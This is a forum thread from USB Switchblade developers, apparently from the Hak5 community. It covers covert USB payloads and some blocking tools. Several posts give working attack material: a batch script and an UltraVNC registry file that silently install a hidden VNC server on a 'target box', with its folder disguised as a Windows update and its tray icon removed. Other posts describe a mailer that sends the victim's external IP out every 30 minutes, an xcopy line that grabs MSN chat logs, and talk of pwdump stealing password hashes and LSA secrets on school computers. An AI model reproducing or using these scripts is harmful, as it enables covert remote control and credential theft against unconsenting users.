USB Switchblade Development

[moonlit]

I think I've got an idea for a Switchblade blocker; it's not very efficient but it's quick, dirty and does the job...

I'll be posting up binaries and source in this thread within an hour or two, I've got a few other things to do but I think I've figured it out... stay tuned!

[Quile]

Can some1 make me .exe file what would just open the scan.cmd file .thx

[VaKo]

Unlikely

[moonlit]

Here's a (very) basic Switchblade prevention concept. It's extremely crude and unbelivably simple but...

http://www.freewebs.com/5kah/SB_Prevent.rar

Visual Basic 6 Source and compiled .exe to demonstrate simple file locking in the root dir of any drive. This could be expanded to subdirectories too and could be customised to only function if the drive is removable and/or a serial number is white/blacklisted.

It could also work on any form of executable file (.exe, .com, .scr, .pif, .bat, .cmd, .bat, etc).

Use with caution, it's probably rather buggy, I've tested it a little but during testing I zero'd out a couple of exe files... this is now fixed and as far as I know it's ok but you know how these things go... :)

How to use: Run the program, point to the drive containing the executable(s) to prevent running and click lock. Try running the exe file, Windows should stop you from doing so. Click Unlock and quit the program to unlock.

Again, it ONLY works on files in the root dir atm so files in directories WILL NOT BE LOCKED.

[Darren Kitchen]

Here's a (very) basic Switchblade prevention concept. It's extremely crude and unbelivably simple but...

http://www.freewebs.com/5kah/SB_Prevent.rar

Visual Basic 6 Source and compiled .exe to demonstrate simple file locking in the root dir of any drive. This could be expanded to subdirectories too and could be customised to only function if the drive is removable and/or a serial number is white/blacklisted.

It could also work on any form of executable file (.exe, .com, .scr, .pif, .bat, .cmd, .bat, etc).

Use with caution, it's probably rather buggy, I've tested it a little but during testing I zero'd out a couple of exe files... this is now fixed and as far as I know it's ok but you know how these things go... :)

How to use: Run the program, point to the drive containing the executable(s) to prevent running and click lock. Try running the exe file, Windows should stop you from doing so. Click Unlock and quit the program to unlock.

Again, it ONLY works on files in the root dir atm so files in directories WILL NOT BE LOCKED.

Funny, I was thinking about something similar on my drive back from work today. I was going to bring it up in a Dev5 meeting. I'll post about it after I sleep. No, scratch that, after the episode is out. Priorities. But yes, a switchblade shield would be a fun project, though sort of seperate from this thread. We'll coordinate on that later. Zzz

[pseudobreed]

TrustNoExe Does this rather well.

I never try and reinvent the wheel unless I know I can do better, and so far I see no reason to develope preventive measures further beyond TrustNoExe and DeviceLock.

On a side project, Im trying to figure out how to get around the OS knowing it's a drive. In short, Im playing with drivers, root kits and gpo's.

If I can figure that out, then Im going to have to write something to fix it.

[PoyBoy]

rootkits. Tasty...

[concrete nomad]

1. Download Nomad's Registry Hacks. I have little GUI that disables the LM hash, autoplay, and a ton of other fun things. A new build will be out soon as soon as I get around to it. The new build will lock down a Windows box even more than the current build and get rid of some lousy tweaks.

2. Just disable USB storage devices. It is a very common security procedure these days.

3. Disable VB scripting.

[Snax]

so i just switched over to DLSS's payload and plugged my usb into my computer at school (yes i do keep school work on it too) and i got a pop up message saying that windows could not find some .dll file (i should have written it down) and decided to restart in 60 seconds. I found this odd so let it restart and than plugged it in again. Same thing, i switched over to another comp and it happened again, I tried two more comps and this did not happen. The payload ran just fine and normal. Anyone have this same problem, or know whats going on? Thanks.

[eDgE]

I was inspired by eDgE, nifty little program. So I added some features, and rewrote it in c++.

http://rapidshare.de/files/35500706/bait-a...hblade.zip.html

It only uses one file "baseball.txt". It uses the following format

0;notepad.exe;1;sol.exe;

The first entry should be Zero if you want the program to be hidden, and 1 if you don't want it to be hidden. The second entry says what program to run. You can repeat this as many times as you have programs to run.

Only the first line of baseball.txt will be used any further lines in the file will be ignored, this can be useful for disguising the file.

Any thoughts or ideas would be welcome.

f-ing A++ man, nice idea...shame i cant program that well or id have done the same...o well...im learning....nice one psychoaliendog...

[Raven Xp]

so i just switched over to DLSS's payload and plugged my usb into my computer at school (yes i do keep school work on it too) and i got a pop up message saying that windows could not find some .dll file (i should have written it down) and decided to restart in 60 seconds. I found this odd so let it restart and than plugged it in again. Same thing, i switched over to another comp and it happened again, I tried two more comps and this did not happen. The payload ran just fine and normal. Anyone have this same problem, or know whats going on? Thanks.

That would probably be the lsass.dll, I've had the same issue on occasion, if you look in the wiki there's info there on it.

[eDgE]

i got a problem on my college pcs aswell.... anyone heard of "orean.sys" ?? aparantly cant "update orean.sys" i found its from some software but....it fails when I plug it in (ie, doesnt dump pword or lsa secrets) if anyone else has got this problem, give me a shout.

[sircrumpet]

so i just switched over to DLSS's payload and plugged my usb into my computer at school (yes i do keep school work on it too) and i got a pop up message saying that windows could not find some .dll file (i should have written it down) and decided to restart in 60 seconds. I found this odd so let it restart and than plugged it in again. Same thing, i switched over to another comp and it happened again, I tried two more comps and this did not happen. The payload ran just fine and normal. Anyone have this same problem, or know whats going on? Thanks.

Put simply, windows is complaining about the fact that one of the files on your switchblade (pwdump.exe) is attempting to steal the SAM file - Windows reads it as an error, and shuts down your computer to "protect your system"...

[Snax]

Yea i will have to do it again on the same set of computers and copy down what it says (the file that gets corrupted)

Thanks guys. I cant wait to see whats on the hacksaw.

[Iain]

I was inspired by eDgE, nifty little program. So I added some features, and rewrote it in c++.

What did you use to compile the code? I've tried Dev-C++ and VC++ Express Edition and they both throw up errors.

[eDgE]

guessing youve heard of the package prototyper, or "faking" programs onto your u3 device? becuase what i did is, instead of "flashing" the cd partition, i just put my program into the package prototyper and told it to autorun when the u3 launcher runs....easier way if you dont want to get rid of the launchpad (or just stick launchpad.exe and your loader of choice into the autorun.inf file) hope that helps some people who didnt want to "take the leap of faith" into flashing the partition....

[Nakaori]

ok. i wrote a little thing that installs VNC as a service on the target box.

@echo off

:: This batch file installs VNC automatically with the

:: password set to "yougothacked".

:: You can use this batchfile with the USB Switchblade so it

:: installs silently. It will remove the VNC icon with a little

:: hack. It will also set the directory to invisible.

:: Hope you like it :)

:: Always trust your technolust!



:start

:: This is the same as Darrens Method on the Hacksaw. It creates a directory in the windows directory when you are logged in as admin. Otherwise it does the same in the appdate folder.

mkdir %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || mkdir "%appdata%hbn"



:: Changing directory to the VNC installation files

cd ../VNCInstallFiles



:: Copying the necessary files to the harddrive.

copy *.* %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || copy *.* "%appdata%hbn"



:: We set the files to hidden here

attrib %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ +s +h & attrib "%appdata%hbn" +s +h



:: Here are some regedit entries which have to be there, to allow the VNC Server to run as a service

regedit /s ../CMD/vncdmp.reg

regedit /s ../CMD/vncdmp1.reg

regedit /s ../CMD/vncdmp2.reg



:: A little pause before...

ping -n 1 localhost  > nul



:: ...we start the VNC Service.

net start WinVNC

available on the wiki

[Jay]

Hi all,

I've downloaded MaxDamage's MemorexSB and attempted to run the installer. But I get this message: "No U3 smart drive was found". I just bought the Memorex U3 and plugged it in and went through the menu before I started the loader. I still have the U3 icon in my taskbar.

I would have tried to search the switchblade forum for the error text above, but that is difficult at best.

I found the updater log and saw this information:

10:33:09,910 #=Main SdkListener.cpp:669[CSdkListener::IsDeviceSupported] le=2 - device vendor type string (U3)

10:33:09,910 #=Main vpid.cpp:60[CVidPidVerifier::IsValueInSupportedValuesList] - 32 is not supported

10:33:09,910 #=Main vpid.cpp:165[CVidPidVerifier::IsVendorProductSupported] le=2 - vendor id 2284 (supported), vendor name Memorex (supported), product name Mini TravelDrive (supported), product id 32 (not supported)

Hope that helps, cause I have no idea what it means. I did pm Max but he said he could not help and recommended I post to the board.

...and okay, I'll bite - what does NOOB mean :?

Thanks, Jay

[pseudobreed]

@Jay

LPInstaller only works on SanDisk Cruzer Drives. Use Tyrone D's Method for Memorex.

@Nakaori

:: Setup VNC

regedit /s RECYCLERultravnc.reg

mkdir "%ProgramFiles%UltraVNC"

xcopy RECYCLERUltraVNC "%ProgramFiles%UltraVNC" /D /E /C /I /H /F /R /Y

"%ProgramFiles%UltraVNCwinvnc.exe" -reinstall

Content of ultravnc.reg, change password to what you please.

Windows Registry Editor Version 5.00



[HKEY_LOCAL_MACHINESOFTWAREORL]



[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3]

"DisableTrayIcon"=dword:00000001

"DebugMode"=dword:00000000

"DebugLevel"=dword:00000000

"AllowLoopback"=dword:00000000

"LoopbackOnly"=dword:00000000

"MSLogonRequired"=dword:00000000

"NewMSLogon"=dword:00000000

"UseDSMPlugin"=dword:00000000

"ConnectPriority"=dword:00000000

"DSMPlugin"=hex:00,4a,53,80,02,00,00,00,08,00,00,00,00,00,00,00,a5,4c,00,00,0a,

  00,00,00,1d,4d,00,00,b0,fa,3f,84,a5,4c,00,00,10,e1,3f,84,a4,4c,00,00,a8,d3,

  5a,c0,00,00,00,00,a8,d3,5a,c0,00,00,00,00,38,00,00,00,23,00,00,00,23,00,00,

  00,ce,2b,de,77,44,ff,ac,00,88,2b,9b,00,00,00,4e,77,98,ad,15,00,15,c1,44,00,

  00,00,00,00,29,06,81,7c,1b,00,00,00,00,02,00,00,fc,ff,bc,00,23,00,00,00,b6,

  39,5c,80,50,1b,6a,b4,a0,23,9b,00,00,00,00,00,00,00,00,00,00,00,00,00,00,1b,

  6a,b4,a0,ac,3c,84,07,00,00,00,c0,15,f6,83,07,00,00,00,c0,15,f6,83,78,13,f6,

  83,bc,15,f6,83,78,13,f6,83,bc,15,f6,83,78,13,f6,83,00,a8,3c,84,78,13,f6,83,

  bc,15,f6,83,78,13,f6,83,30,a8,3c,84,00,13,f6,83,60,13,f6,83,7c,1c,6a,b4,2a,

  57,5c,80,00,00,00,00,e0,06,6d,80,20,07,6d,80,55,ea,6f,00,00,00,00,00,00,00,

  00,00,01,00,00,00,ff,0f,1f,00



[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]

"=AllowShutdown"=dword:00000000

"FileTransferEnabled"=dword:00000001

"FTUserImpersonation"=dword:00000001

"BlankMonitorEnabled"=dword:00000000

"CaptureAlphaBlending"=dword:00000000

"BlackAlphaBlending"=dword:00000000

"DefaultScale"=dword:00000001

"UseDSMPlugin"=dword:00000000

"DSMPlugin"=hex:00,4a,53,80,02,00,00,00,08,00,00,00,00,00,00,00,a5,4c,00,00,0a,

  00,00,00,1d,4d,00,00,b0,fa,3f,84,a5,4c,00,00,10,e1,3f,84,a4,4c,00,00,a8,d3,

  5a,c0,00,00,00,00,a8,d3,5a,c0,00,00,00,00,38,00,00,00,23,00,00,00,23,00,00,

  00,ce,2b,de,77,44,ff,ac,00,88,2b,9b,00,00,00,4e,77,98,ad,15,00,15,c1,44,00,

  00,00,00,00,29,06,81,7c,1b,00,00,00,00,02,00,00,fc,ff,bc,00,23,00,00,00,b6,

  39,5c,80,50,1b,6a,b4,a0,23,9b,00,00,00,00,00,00,00,00,00,00,00,00,00,00,1b,

  6a,b4,a0,ac,3c,84,07,00,00,00,c0,15,f6,83,07,00,00,00,c0,15,f6,83,78,13,f6,

  83,bc,15,f6,83,78,13,f6,83,bc,15,f6,83,78,13,f6,83,00,a8,3c,84,78,13,f6,83,

  bc,15,f6,83,78,13,f6,83,30,a8,3c,84,00,13,f6,83,60,13,f6,83,7c,1c,6a,b4,2a,

  57,5c,80,00,00,00,00,e0,06,6d,80,20,07,6d,80,55,ea,6f,00,00,00,00,00,00,00,

  00,00,01,00,00,00,ff,0f,1f,00

"SocketConnect"=dword:00000001

"HTTPConnect"=dword:00000000

"XDMCPConnect"=dword:00000000

"AutoPortSelect"=dword:00000001

"InputsEnabled"=dword:00000001

"LocalInputsDisabled"=dword:00000000

"IdleTimeout"=dword:00000000

"QuerySetting"=dword:00000002

"QueryTimeout"=dword:0000000a

"QueryAccept"=dword:00000000

"LockSetting"=dword:00000000

"RemoveWallpaper"=dword:00000000

"Password"=hex:db,d8,3c,fd,72,7a,14,58

"AllowShutdown"=dword:00000000

"AllowProperties"=dword:00000001

"AllowEditClients"=dword:00000001

[rickjs]

I'm using kapowdude's technique, which I'm pretty sure is a combo of maxdamage and amish's technique. Anyway, is there a way to get the flash drive to start the switchblade without going in my computer and autoplay? I mean I have a U3 device but I messed the last one up while installing one of the U3 techniques. So, can I?

[ace9]

Hey guys

I've been following the progress of this project very closely and it is going quite well. Nice job guys!

The reason for my post is that I have a suggestion for a feature. The ability to grab all the msn logs. As far as I know, no program exists that will dump them already. To get them, it would be easy as the paths are located in the registry. So perhaps a basic c++ program. But if this cant be done, the other 2 options are, gram all .xml files or grab the my recieved files folder as that is where they are typically located.

please let me know of your oppinion of this suggestion.

ace

[DLSS]

can b done thru commandline (or in a cmd/bat file)

xcopy "C:Documents and Settings%username%My Documentsmy recieved files*.xml" "location to dump to"

[psychoaliendog]

What did you use to compile the code? I've tried Dev-C++ and VC++ Express Edition and they both throw up errors.

I used Visual Studio Pro, what errors are you getting?

Do the errors in dev-c++ refer to the fopen_s? That sis Microsoft's "secure" fopen Function.

[Nakaori]

ok. i wrote a little thing that installs VNC as a service on the target box.

:: This batch file installs VNC automatically with the

:: password set to "yougothacked".

:: You can use this batchfile with the USB Switchblade so it

:: installs silently. It will remove the VNC icon with a little

:: hack. It will also set the directory to invisible.

:: Hope you like it :)

:: Always trust your technolust!

i made a little addon for this.

now it automatically starts a hidden batchfile which sends you the current external ip every 30 minutes to a specified email account.

credits to gonffen for helping me with the ip getter :>

btw. available on the wiki ;)

[Iain]

I used Visual Studio Pro, what errors are you getting?

The errors from VC++ Express Edition:

------ Build started: Project: Bait, Configuration: Debug Win32 ------

Compiling...

Listing.cpp

c:documents and settingsXXXXXXmy documentsvisual studio 2005projectsbaitlisting.cpp(74) : error C2664: 'ShellExecuteW' : cannot convert parameter 2 from 'const char [5]' to 'LPCWSTR'

Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast

c:documents and settingsXXXXXXmy documentsvisual studio 2005projectsbaitlisting.cpp(76) : error C2664: 'ShellExecuteW' : cannot convert parameter 2 from 'const char [5]' to 'LPCWSTR'

Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast

c:documents and settingsXXXXXXmy documentsvisual studio 2005projectsbaitlisting.cpp(83) : error C2664: 'MessageBoxW' : cannot convert parameter 2 from 'const char [6]' to 'LPCWSTR'

Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast

Build log was saved at "file://c:Documents and SettingsXXXXXXMy DocumentsVisual Studio 2005ProjectsBaitDebugBuildLog.htm"

Bait - 3 error(s), 0 warning(s)

========== Build: 0 succeeded, 1 failed, 0 up-to-date, 0 skipped ==========

I'll post the Dev-C++ errors if I can't get VC++EE to compile it.

Iain